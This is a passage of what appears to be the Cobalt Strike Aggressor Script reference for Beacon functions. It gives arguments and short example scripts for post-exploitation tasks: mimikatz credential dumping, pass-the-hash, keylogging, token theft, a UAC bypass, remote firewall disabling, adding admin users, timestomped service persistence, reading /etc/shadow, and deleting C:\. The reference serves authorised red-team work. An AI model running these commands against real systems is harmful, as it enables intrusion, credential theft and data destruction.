$1 - the id for the Beacon

$2 - the path to the BOF file

$3 - the string argument to pass to the BOF file

Notes

This functions follows the behavior of *inline-execute* in the Beacon console. The string argument will be zero-terminated, converted to the target encoding, and passed as an argument to the BOF's go function. To execute a BOF, with more control, use &beacon_inline_execute

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

binput

Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon's logs.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

# indicate the user ran the ls command
binput($1, "ls");

bipconfig

Task a Beacon to list network interfaces.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

alias ipconfig {
   bipconfig($1, {
      blog($1, "Network information is:\n $+ $2");
   });
}

bjobkill

Ask Beacon to kill a running post-exploitation job

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the job ID.

Example

bjobkill($1, 0);

bjobs

Ask Beacon to list running post-exploitation jobs.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bjobs($1);

bjump

Ask Beacon to spawn a session on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the technique to use

$3 - the remote target

$4 - the listener to spawn

Example

# winrm [target] [listener]
alias winrm {
   bjump($1, "winrm", $2, $3); {
}
See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits

bkerberos_ccache_use

Ask beacon to inject a UNIX kerberos ccache file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the ccache file

Example

alias kerberos_ccache_use {
   bkerberos_ccache_use($1, $2);
}

bkerberos_ticket_purge

Ask beacon to purge tickets from the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias kerberos_ticket_purge {
   bkerberos_ticket_purge($1);
}

bkerberos_ticket_use

Ask beacon to inject a mimikatz kirbi file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path the kirbi file

Example

alias kerberos_ticket_use {
   bkerberos_ticket_use($1, $2);
}

bkeylogger

Injects a keystroke logger into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the keystroke logger into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
bkeylogger($1;
Inject into the specified process
bkeylogger($1, 1234, "x64");

bkill

Ask Beacon to kill a process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to kill

Example

bkill($1, 1234);

blink

Ask Beacon to link to a host over a named pipe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to link to

$3 - [optional] the pipename to use. The default pipename in the Malleable C2 profile is the default otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

blink($1, "DC");

blog

Post a message to WordPress.com (just kidding). Publishes an output message to the Beacon transcript.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo {
   blog($1, "I am output for the blog function");
}

blog2

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo2 {
   blog2($1, "I am output for the blog2 function");
}

bloginuser

Ask Beacon to create a token from the specified credentials. This is the make_token command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

Example

# make a token for a user with an empty password
alias make_token_empty {
   local('$domain $user');
   ($domain, $user) = split("\\\\", $2);]
   bloginuser($1, $domain, $user, "");
}

blogonpasswords

Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the logonpasswords command into or $null

$3 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "Dump &Passwords" {
   binput($1, "logonpasswords");
   blogonpasswords($1);
}
Inject into the specified process
beacon_command_register(
   "logonpasswords_inject",
   "Inject into a process and dump in-memory credentials with mimikatz",
   "Usage: logonpasswords_inject [pid] [arch]");

alias logonpasswords_inject {
   blogonpasswords($1, $2, $3);
}

bls

Task a Beacon to list files

Variations

bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to list files for. Use . for the current folder.

$3 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results

Example

on beacon_initial {
   bls($1, ".");
}

bmimikatz

Ask Beacon to run a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Examples

# Usage: coffee [pid] [arch]
alias coffee {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz($1, "standard::coffee", $2, $3);
   } else {
      bmimikatz($1, "standard::coffee");
   }
}
alias double_espresso {
bmimikatz($1, "standard::coffee;standard::coffee");
}

bmimikatz_small

Use Cobalt Strike's "smaller" internal build of Mimikatz to execute a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Note

This mimikatz build supports:

* kerberos::golden
* lsadump::dcsync
* sekurlsa::logonpasswords
* sekurlsa::pth

All of the other stuff is removed for size. Use &bmimikatz if you want to bring the full ULTIMATE power of mimikatz to bare on some other offense problem.

Example

# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
   } else {
      bmimikatz_small($1, "!sekurlsa::logonpasswords");
   }
}

bmkdir

Ask Beacon to make a directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to create

Example

bmkdir($1, "you are owned");

bmode

Change the data channel for a DNS Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the data channel (e.g., dns, dns6, or dns-txt)

Example

item "Mode DNS-TXT" {
   binput($1, "mode dns-txt");
   bmode($1, "dns-txt");
}

bmv

Ask Beacon to move a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to move

$3 - the destination

Example

bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");

bnet

Run a command from Beacon's network and host enumeration tool.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to run.

Type Description
computers lists hosts in a domain (groups)
dclist lists domain controllers
domain show the current domain
domain_controllers list domain controller hosts in a domain (groups)
domain_trusts lists domain trusts
group lists groups and users in groups
localgroup lists local groups and users in local groups
logons lists users logged onto a host
sessions lists sessions on a host
share lists shares on a host
user lists users and user information
time show time for a host
view lists hosts in a domain (browser service)

$3 - the target to run this command against or $null

$4 - the parameter to this command (e.g., a group name)

$5 - the PID to inject the network and host enumeration tool into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Notes

  • The domain command executes a BOF using inline_execute and will not spawn or inject into a process
  • To spawn a temporary process to inject into do not specify the $5 (PID) and $6 (arch) arguments
  • To inject into a specific process specify the $5 (PID) and $6 (arch) arguments.

Example

Spawn a temporary process
# ladmins [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $2, "administrators");
}
Inject into the specified process
# ladmins [pid] [arch] [target]
# find the local admins for a target
alias ladmins {
   bnet($1, "localgroup", $4, "administrators", $2, $3);
}

bnote

Assign a note to the specified Beacon.

Arguments

$1 - the id for the beacon to post to

$2 - the note content

Example

bnote($1, "foo");

bof_extract

This function extracts the executable code from the beacon object file.

Arguments

$1 - A string containing the beacon object file

Example

$handle = openf(script_resource("/object_file"));
$data   = readb($handle, -1);
closef($handle);

return bof_extract($data);

bof_pack

Pack arguments in a way that's suitable for BOF APIs to unpack.

Arguments

$1 - the id for the Beacon (needed for unicode conversions)

$2 - format string for the packed data

... - one argument per item in our format string

Note

This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.

Type Description Unpack With (C)
b binary data BeaconDataExtract
i 4-byte integer BeaconDataInt
s 2-byte short integer BeaconDataShort
z zero-terminated+encoded string BeaconDataExtract
Z zero-terminated wide-char string (wchar_t *)BeaconDataExtract

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

See also

&beacon_inline_execute

bpassthehash

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password hash

$5 - the PID to inject the pth command into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "&Keylogger" {
   binput($1, "keylogger");
   bkeylogger($1);
}
Inject into the specified process
bkeylogger($1, 1234, "x64");

bpause

Ask Beacon to pause its execution. This is a one-off sleep.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - how long the Beacon should pause execution for (milliseconds)

Example

alias pause {
   bpause($1, int($2));
}

bportscan

Ask Beacon to run its port scanner.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the targets to scan (e.g., 192.168.12.0/24)

$3 - the ports to scan (e.g., 1-1024,6667)

$4 - the discovery method to use (arp|icmp|none)

$5 - the max number of sockets to use (e.g., 1024)

$6 - the PID to inject the port scanner into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
Inject into the specified process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");

bpowerpick

Spawn a process, inject Unmanaged PowerShell, and run the specified command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
   bpowerpick($1, '$PSVersionTable.PSVersion');
}

bpowershell

Ask Beacon to run a PowerShell cmdlet

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell...
alias powerver {
   bpowershell($1, '$PSVersionTable.PSVersion');
}

bpowershell_import

Import a PowerShell script into a Beacon

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the local file to import

Example

# quickly run PowerUp
alias powerup {
   bpowershell_import($1, script_resource("PowerUp.ps1"));
   bpowershell($1, "Invoke-AllChecks");
}

bpowershell_import_clear

Clear the imported PowerShell script from a Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias powershell-clear {
   bpowershell_import_clear($1);
}

bppid

Set a parent process for Beacon's child processes

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the parent process ID. Specify 0 to reset to default behavipr.

Notes

  • The current session must have rights to access the specified parent process.
  • Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.

Example

# getexplorerpid($bid, &callback);
sub getexplorerpid {
   bps($1, lambda({
      local('$pid $name $entry');
      foreach $entry (split("\n", $2)) {
         ($name, $null, $pid) = split("\\s+", $entry);
         if ($name eq "explorer.exe") {
            [$callback: $1, $pid];
         }
      }
   }, $callback => $2));
}

alias prepenv {
   btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
   getexplorerpid($1, {
      bppid($1, $2);
   });
}

bprintscreen

Ask Beacon to take a screenshot via PrintScr method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool via PrintScr method

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Printscreen" {
binput($1, "printscreen");
bpintscreen($1);
}
Inject into the specified process
bprintscreen($1, 1234, "x64");

bps

Task a Beacon to list processes

Variations

bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

on beacon_initial {
   bps($1);
}

bpsexec

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it. Clean up is included too.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to spawn a payload onto

$3 - the listener to spawn

$4 - the share to copy the executable to

$5 - the architecture of the payload to generate/deliver (x86 or x64)

Example

brev2self();
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");

bpsexec_command

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to run the command on

$3 - the name of the service to create

$4 - the command to run.

Example

# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
   bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

bpsexec_psh

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.

bpsinject

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the process architecture (x86 | x64)

$4 - the cmdlet to run

Example

bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");

bpwd

Ask Beacon to print its current working directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias pwd {
   bpwd($1);
}

breg_query

Ask Beacon to query a key within the registry.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - x86|x64 - which view of the registry to use

Example

alias typedurls {
   breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x86");
}

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

bremote_exec

Ask Beacon to run a command on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote execute method to use

$3 - the remote target

$4 - the command and arguments to run

Example

# winrm [target] [command+args]
alias winrm-exec {
   bremote_exec($1, "winrm", $2, $3); {
}
See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods

brev2self

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias rev2self {
   brev2self($1);
}

brm

Ask Beacon to remove a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to remove

Example

# nuke the system
brm($1, "c:\\");

brportfwd

Ask Beacon to setup a reverse port forward.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd($1, 80, "192.168.12.88", 80);

brportfwd_local

Ask Beacon to setup a reverse port forward that routes that the current Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd_local($1, 80, "192.168.12.88", 80);

brportfwd_stop

Ask Beacon to stop a reverse port forward

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port bound on the target

Example

brportfwd_stop($1, 80);

brun

Ask Beacon to run a command

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Note

This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.

Example

alias w {
   brun($1, "whoami /all");
}

brunas

Ask Beacon to run a command as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the command to run

Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

brunasadmin

Ask Beacon to run a command in a high-integrity context (bypasses UAC).

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and its arguments.

Notes

This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

  • Your user must be a local admin
  • If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

# disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

brunu

Ask Beacon to run a process under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the parent process

$3 - the command + arguments to run

Example

brunu($1, 1234, "notepad.exe");

bscreenshot

Ask Beacon to take a screenshot.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Screenshot" {
   binput($1, "screenshot");
   bscreenshot($1);
}
Inject into the specified process
bscreenshot($1, 1234, "x64");

bscreenwatch

Ask Beacon to take periodic screenshots

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Screenwatch" {
   binput($1, "screenwatch");
   bscreenwatch($1);
}
Inject into the specified process
bscreenwatch($1, 1234, "x64");

bsetenv

Ask Beacon to set an environment variable

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the environment variable to set

$3 - the value to set the environment variable to (specify $null to unset the variable)

Example

alias tryit {
   bsetenv($1, "foo", "BAR!");
   bshell($1, "echo %foo%");
}

bshell

Ask Beacon to run a command with cmd.exe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

alias adduser {
   bshell($1, "net user $2 B00gyW00gy1234! /ADD");
      bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

bshinject

Inject shellcode (from a local file) into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the process to inject into

$3 - the process architecture (x86 | x64)

$4 - the local file with the shellcode

Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

bshspawn

Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process architecture (x86 | x64)

$3 - the local file with the shellcode

Example

bshspawn($1, "x86", "/path/to/stuff.bin");

bsleep

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the number of seconds between beacons.

$3 - the jitter factor [0-99]

Example

alias stealthy {
   # sleep for 1 hour with 30% jitter factor
   bsleep($1, 60 * 60, 30);
}

bsleepu

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - beacon sleep period string.

The beacon sleep period string takes the format: ud vh xm ys zj

Were:

w is the number of days

v is the number of hours

x is the number of minutes

y is the number of seconds

z is the jitter factor [0 - 99]

Example

alias stealthy {
   # sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
   bsleepu($1, "2d 13h 45m 8s 30j");
}

bsocks

Start a SOCKS proxy server associated with a beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to

$3 - SOCKS version [SOCKS4|SOCKS5] Default: SOCKS4

For SOCKS 5 only:

$4 - enable/disable NoAuth authentication [enableNoAuth|disableNoAuth] Default: enableNoAuth

$5 - username for User/Password authentication [blank|username] Default: Blank

$6 - password for User/Password authentication [blank|password] Default: Blank

$7 - enable logging [enableLogging|disableLogging] Default: disableLogging

Example

alias socksPorts {
bsocks($1, 10401);
bsocks($1, 10402, "SOCKS4");
bsocks($1, 10501, "SOCKS5");
bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "", "disableLogging");
bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname", "mypassword", "disableLogging");
bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname", "mypassword", "enableLogging");
}

bsocks_stop

Stop SOCKS proxy servers associated with the specified Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias stopsocks {
   bsocks_stop($1);
}

bspawn

Ask Beacon to spawn a new session

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the listener to target.

$3 - the architecture to spawn a process for (defaults to current beacon arch)

Example

item "&Spawn" {
   openPayloadHelper(lambda({
      binput($bids, "spawn x86 $1");
      bspawn($bids, $1, "x86");
   }, $bids => $1));
}

bspawnas

Ask Beacon to spawn a session as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the listener to spawn

Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

bspawnto

Change the default program Beacon spawns to inject capabilities into.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the architecture we're modifying the spawnto setting for (x86, x64)

$3 - the program to spawn

Notes

The value you specify for spawnto has to work from x86->x86, x86->x64, x64->x86, and x64->x86 contexts. This is tricky. Follow these rules and you'll be OK:

1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.

2. Environment variables (e.g., %windir%) are OK within these paths.

3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.

4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.

Example

# let's make everything lame.
on beacon_initial {
   binput($1, "prep session with new spawnto values.");
   bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
   bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}

bspawnu

Ask Beacon to spawn a session under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to spawn this session under

$3 - the listener to spawn

Example

bspawnu($1, 1234, "my listener");

bspunnel

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bspunnel_local

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bssh

Ask Beacon to spawn an SSH session.

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - password

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");
Inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");

bssh_key

Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:

/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - key data (as a string)

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

alias myssh {
   $pid = $2;
   $arch = $3;
   $handle = openf("/path/to/key.pem");
   $keydata = readb($handle, -1);
   closef($handle);

   if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
   } else {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata);
   }
};

bstage

REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.

bsteal_token

Ask Beacon to steal a token from a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from

Use: bsteal_token [pid]
     bsteal_token [pid] <OpenProcessToken access mask>
 
OpenProcessToken access mask suggested values:
  blank = default (TOKEN_ALL_ACCESS)
0 = TOKEN_ALL_ACCESS
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)
Access mask values:
STANDARD_RIGHTS_REQUIRED . . . . : 983040
TOKEN_ASSIGN_PRIMARY . . . . . . : 1
TOKEN_DUPLICATE . . . . . . . . : 2
TOKEN_IMPERSONATE . . . . . . . : 4
TOKEN_QUERY . . . . . . . . . . : 8
TOKEN_QUERY_SOURCE . . . . . . . : 16
TOKEN_ADJUST_PRIVILEGES . . . . : 32
TOKEN_ADJUST_GROUPS . . . . . . : 64
TOKEN_ADJUST_DEFAULT . . . . . . : 128
TOKEN_ADJUST_SESSIONID . . . . . : 256

 

NOTE:

'OpenProcessToken access mask' can be helpful for stealing tokens from processes using 'SYSTEM' user and you have this error: Could not open process token: {pid} (5)

You can set your preferred default with '.steal_token_access_mask' in the Malleable C2 global options.

Example

alias steal_token {
   bsteal_token($1, int($2));
}

bsudo

Ask Beacon to run a command via sudo (SSH sessions only)

Arguments

$1 - the id for the session. This may be an array or a single ID.

$2 - the password for the current user

$3 - the command and arguments to run

Example

# hashdump [password]
ssh_alias hashdump {
   bsudo($1, $2, "cat /etc/shadow");
}

bsyscall_method

Ask Beacon to change its syscall method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the syscall method. Supported methods are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

NOTE:

If the $2 argument is empty, Beacon is tasked to query the currently used syscall method.

Example

alias syscall_method {
bsyscall_method($1, $2);
}

btask

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.

https://attack.mitre.org

Example

alias foo {
   btask($1, "User tasked beacon to foo", "T1015");
}

btimestomp

Ask Beacon to change the file modified/accessed/created times to match another file.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to update timestamp values for

$3 - the file to grab timestamp values from

Example

alias persist {
   bcd($1, "c:\\windows\\system32");
   bupload($1, script_resource("evil.exe"));
   btimestomp($1, "evil.exe", "cmd.exe");
   bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
   bshell($1, 'sc start netsrv');
}

btoken_store_remove

Ask Beacon to remove specific access tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of token IDs to remove.

Example

alias token-store_remove {
btoken_store_remove($1, @(int($2)));
}

btoken_store_remove_all

Ask Beacon to remove all tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_remove_all {
btoken_store_remove_all($1);
}

btoken_store_show

Ask Beacon to print the tokens currently available in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_show {
btoken_store_show($1);
}

btoken_store_steal

Ask Beacon to steal a token and store it in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of PIDs to take the tokens from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal {
btoken_store_steal($1, @(int($2)), 11);
}

btoken_store_steal_and_use

Ask Beacon to steal a token, store it and immediately apply it to the beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal_and_use {
btoken_store_steal_and_use($1, int($2), 11);
}

btoken_store_use

Ask Beacon to use a token from the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the token ID.

Example

alias token-store_use {
btoken_store_use($1, int($2));
}

bunlink

Ask Beacon to delink a Beacon its connected to over a TCP socket or named pipe.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target host to unlink (specified as an IP address)

$3 - [optional] the PID of the target session to unlink

Example

bunlink($1, "172.16.48.3");

bupload

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the file to upload

Example

bupload($1, script_resource("evil.exe"));

bupload_raw

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote file name of the file

$3 - the raw content of the file

$4 - [optional] the local path to the file (if there is one)

Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

bwdigest

REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.

bwinrm

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.

bwmi

REMOVED Removed in Cobalt Strike 4.0.

call

Issue a call to the team server.

Arguments

$1 - the command name

$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.

... - one or more arguments to pass into this call.

Example

call("aggressor.ping", { warn(@_); }, "this is my value");

closeClient

Close the current Cobalt Strike team server connection.

Example

